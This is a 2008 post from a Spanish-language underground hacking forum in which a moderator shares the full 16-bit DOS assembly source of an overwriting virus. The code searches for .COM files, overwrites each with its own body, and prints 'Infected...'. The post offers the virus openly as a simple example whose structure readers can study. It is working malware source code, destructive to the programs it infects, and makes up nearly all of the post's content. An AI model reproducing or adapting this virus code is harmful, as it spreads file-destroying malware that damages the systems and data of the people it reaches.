Vota por nosotros en el ranking web que participamos

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Octubre 12, 2008, 04:48:15
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Programacion  |  Programación  |  ASM (Moderador: |Shadow|)  |  Tema: [W][V][16b] Virus por sobreescritura 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: [W][V][16b] Virus por sobreescritura  (Leído 149 veces)
|Shadow|
Dein Nulls
Moderadores
Colaborador
*****
Desconectado Desconectado

Mensajes: 910


Fucking mnemonic c0d1n6!

shadow@el-hacker.org
Ver Perfil WWW Email
« en: Abril 10, 2008, 04:37:15 »

Aqui otro virus de reescritura ... bstante simple para ver su estructura.

Código: (asm)
org 100h

virus_start:
        jmp go
        db 'pneumo simplex','0'
go:
        mov ah, 4Eh             ; find first file
        mov dx, comfiles
        xor cl, cl
        int 21h
        cmp ax, 0
        je infect
abort:       
        mov ah, 4Ch             ; exit to dos
        int 21h
infect:
        mov ax, 3D01h           ; open file, write mode
        mov dx, 9Eh             
        int 21h
        jc abort

        mov bx, ax
        mov ah, 40h             ; write to file
        mov dx, 100h            ; start of virus
        mov cx, virus_end - virus_start
        int 21h
        jc abort

        mov ah, 3Eh             ; close file
        int 21h
loop_start:
        mov ah, 4Fh             ; find next file
        int 21h
        cmp ax, 0
        je infect

        mov ah, 9h              ; show payload
        mov dx, payload
        int 21h

        jmp abort
comfiles:
        db '*.COM', 0           ; trailing 0 must not be enclosed
payload:
        db 'Infected...',13,10,'$'
virus_end:                      ; capitolize .COM

by: dd

Saludos!
En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion





Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Reglamento del Foro
     Linux  Registered User #473016
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Programacion  |  Programación  |  ASM (Moderador: |Shadow|)  |  Tema: [W][V][16b] Virus por sobreescritura « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.6 | SMF © 2006-2007, Simple Machines LLC